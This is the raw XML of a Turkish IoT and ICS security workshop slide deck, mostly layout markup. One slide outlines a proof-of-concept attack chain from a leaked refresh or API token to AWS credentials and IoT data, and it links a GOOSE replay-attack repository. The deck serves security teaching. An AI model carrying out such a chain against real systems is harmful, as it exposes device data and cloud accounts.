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Roboto"/>
      <p:regular r:id="rId62"/>
      <p:bold r:id="rId63"/>
      <p:italic r:id="rId64"/>
      <p:boldItalic r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono"/>
      <p:regular r:id="rId66"/>
      <p:bold r:id="rId67"/>
      <p:italic r:id="rId68"/>
      <p:boldItalic r:id="rId69"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Nunito Sans"/>
      <p:regular r:id="rId70"/>
      <p:bold r:id="rId71"/>
      <p:italic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C7ED1EB-2574-499A-8F1B-8AD002A6164D}">
  <a:tblStyle styleId="{0C7ED1EB-2574-499A-8F1B-8AD002A6164D}"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NunitoSans-boldItalic.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NunitoSans-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NunitoSans-bold.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NunitoSans-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Roboto-italic.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-bold.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-regular.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-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ono-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9.png>
</file>

<file path=ppt/media/image30.pn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5d6a10e94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 name="Google Shape;62;g35d6a10e943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 name="Google Shape;63;g35d6a10e943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5d6a10e943_0_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5d6a10e943_0_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5d6a10e943_0_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5d6a10e943_0_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5d6a10e943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5d6a10e943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5d6a10e943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35d6a10e943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5d6a10e943_0_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5d6a10e943_0_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36776f9bd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36776f9bd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5d6a10e943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5d6a10e943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5d6a10e943_0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5d6a10e943_0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5d6a10e943_0_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5d6a10e943_0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5d6a10e943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35d6a10e943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35d6a10e943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7" name="Google Shape;87;g35d6a10e943_0_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 name="Google Shape;88;g35d6a10e943_0_2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5d6a10e943_0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5d6a10e943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5d6a10e943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35d6a10e943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5d6a10e943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35d6a10e943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35d6a10e943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35d6a10e943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5d6a10e943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35d6a10e943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5d6a10e943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5d6a10e943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35d6a10e943_0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35d6a10e943_0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5d6a10e943_0_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5d6a10e943_0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5d6a10e943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5d6a10e943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35d6a10e943_0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35d6a10e943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5d6a10e943_0_4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g35d6a10e943_0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5d6a10e943_0_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5d6a10e943_0_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35d6a10e943_0_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35d6a10e943_0_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5d6a10e943_0_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5d6a10e943_0_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35d6a10e943_0_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35d6a10e943_0_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5d6a10e943_0_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5d6a10e943_0_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5d6a10e943_0_8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5d6a10e943_0_8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5d6a10e943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35d6a10e943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35d6a10e943_0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35d6a10e943_0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35d6a10e943_0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35d6a10e943_0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35d6a10e94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35d6a10e94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5d6a10e943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5d6a10e943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5d6a10e943_0_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35d6a10e943_0_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35d6a10e943_0_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35d6a10e943_0_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35d6a10e943_0_1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35d6a10e943_0_1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35d6a10e943_0_7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35d6a10e943_0_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35d6a10e943_0_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35d6a10e943_0_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5d6a10e943_0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35d6a10e943_0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35d6a10e943_0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35d6a10e943_0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35d6a10e943_0_7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35d6a10e943_0_7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35d6a10e943_0_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35d6a10e943_0_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35d6a10e943_0_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35d6a10e943_0_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5d6a10e943_0_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5d6a10e943_0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5d6a10e943_0_785:notes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286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35d6a10e943_0_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35d6a10e943_0_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35d6a10e943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35d6a10e943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35d6a10e943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35d6a10e943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35d6a10e943_0_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35d6a10e943_0_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5d6a10e943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5d6a10e943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5d6a10e943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5d6a10e943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5d6a10e943_0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5d6a10e943_0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5d6a10e943_0_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5d6a10e943_0_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enerated Slide 1_1_1_D">
  <p:cSld name="TITLE_AND_BODY_2_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="50" name="Shape 50"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;51;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="804675"/>
            <a:ext cx="3730200" cy="795600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="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 name="Google Shape;52;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1901954"/>
            <a:ext cx="3730200" cy="26976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3" name="Google Shape;53;p13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233672" y="228600"/>
            <a:ext cx="4690800" cy="4690800"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;54;p13"/>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enerated Slide 1_1_1_G">
  <p:cSld name="TITLE_AND_BODY_2_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="55" name="Shape 55"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Google Shape;56;p14"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233672" y="228600"/>
            <a:ext cx="4690800" cy="4690800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="228600"/>
            <a:ext cx="3557100" cy="841200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="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8" name="Google Shape;58;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1600200"/>
            <a:ext cx="3557100" cy="33192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9" name="Google Shape;59;p14"/>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theme" Target="../theme/theme2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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hyperlink" Target="https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pd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hyperlink" Target="https://www.enisa.europa.eu/publications/enisa-threat-landscap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s://cwe.mitre.org/data/definitions/287.html" TargetMode="Externa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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId7"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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId5"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4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24.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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35.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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3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3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4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3.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4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4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hyperlink" Target="https://my.pcloud.com//#page=filemanager&amp;folder=17164076440" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infotech.pl/products/downloads/trials-for-iec-61850" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/FerdiGul/Goose_Replay_Attack/tree/main"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3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3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3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3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4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2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2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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId8"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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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6" name="Google Shape;66;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3295251" y="4419599"/>
            <a:ext cx="2629800" cy="499500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>31 Mayıs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2025</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="67" name="Google Shape;67;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="3065730" cy="5143500"/>
            <a:chOff x="1" y="0"/>
            <a:chExt cx="4087640" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="68" name="Google Shape;68;p15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1" y="0"/>
              <a:ext cx="3986041" cy="6858000"/>
              <a:chOff x="1" y="0"/>
              <a:chExt cx="3986041" cy="6858000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="69" name="Google Shape;69;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1" y="0"/>
                <a:ext cx="3986041" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="3986041">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3066495" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3427241" y="1211943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3986041" y="4122057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3751724" y="6858000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6858000"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:cu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0" name="Google Shape;70;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1" y="0"/>
                <a:ext cx="3986041" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="3986041">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3066495" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3427241" y="1211943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3986041" y="4122057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3751724" y="6858000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6858000"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="lt1">
                  <a:alpha val="13730"/>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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="71" name="Google Shape;71;p15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2748588" y="0"/>
              <a:ext cx="1339053" cy="6858000"/>
              <a:chOff x="2748588" y="0"/>
              <a:chExt cx="1339053" cy="6858000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="72" name="Google Shape;72;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2748588" y="0"/>
                <a:ext cx="1339053" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="1339053">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3" name="Google Shape;73;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2748588" y="0"/>
                <a:ext cx="1339053" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="1339053">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rotWithShape="1">
                <a:blip r:embed="rId3">
                  <a:alphaModFix amt="57000"/>
                </a:blip>
                <a:tile algn="tl" flip="none" tx="0" sx="100000" ty="0" sy="100000"/>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grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="74" name="Google Shape;74;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="6078270" y="0"/>
            <a:ext cx="3065730" cy="5143500"/>
            <a:chOff x="1" y="0"/>
            <a:chExt cx="4087640" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="75" name="Google Shape;75;p15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1" y="0"/>
              <a:ext cx="3986041" cy="6858000"/>
              <a:chOff x="1" y="0"/>
              <a:chExt cx="3986041" cy="6858000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Google Shape;76;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1" y="0"/>
                <a:ext cx="3986041" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="3986041">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3066495" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3427241" y="1211943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3986041" y="4122057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3751724" y="6858000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6858000"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:cu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7" name="Google Shape;77;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1" y="0"/>
                <a:ext cx="3986041" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="3986041">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3066495" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3427241" y="1211943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3986041" y="4122057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3751724" y="6858000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6858000"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="lt1">
                  <a:alpha val="13730"/>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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="78" name="Google Shape;78;p15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2748588" y="0"/>
              <a:ext cx="1339053" cy="6858000"/>
              <a:chOff x="2748588" y="0"/>
              <a:chExt cx="1339053" cy="6858000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="79" name="Google Shape;79;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2748588" y="0"/>
                <a:ext cx="1339053" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="1339053">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0" name="Google Shape;80;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2748588" y="0"/>
                <a:ext cx="1339053" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="1339053">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rotWithShape="1">
                <a:blip r:embed="rId3">
                  <a:alphaModFix amt="57000"/>
                </a:blip>
                <a:tile algn="tl" flip="none" tx="0" sx="100000" ty="0" sy="100000"/>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grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Google Shape;81;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7128334" y="1208461"/>
            <a:ext cx="1486495" cy="1488000"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1860000" w="2619375">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2619375" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619375" y="1860000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1860000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;82;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2434188" y="1093075"/>
            <a:ext cx="4299600" cy="2289900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buFont typeface="Nunito Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; ICS </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buFont typeface="Nunito Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Workshop</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buFont typeface="Nunito Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Google Shape;83;p15" title="KOÜ Teknopark.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="23517" l="0" r="0" t="21980"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7082550" y="3075000"/>
            <a:ext cx="1578050" cy="860074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84" name="Google Shape;84;p15" title="Cyberus.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="207725" y="2141713"/>
            <a:ext cx="1877730" cy="8600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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173250" y="617050"/>
            <a:ext cx="8797500" cy="154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 sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🧪 4. Gerçek Bir Zafiyet Senaryosu (PoC Demo)</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Refresh Token → AWS Credential → IoT Data Access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Mobil uygulama → şifreli olmayan trafik → API token sızıntısı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Bu bölümde </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hazırladığın PoC kodunu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> göster ve adım adım anlat</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p24"/>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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286675" y="379175"/>
            <a:ext cx="8025300" cy="1977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 sz="1700">
                <a:solidFill>
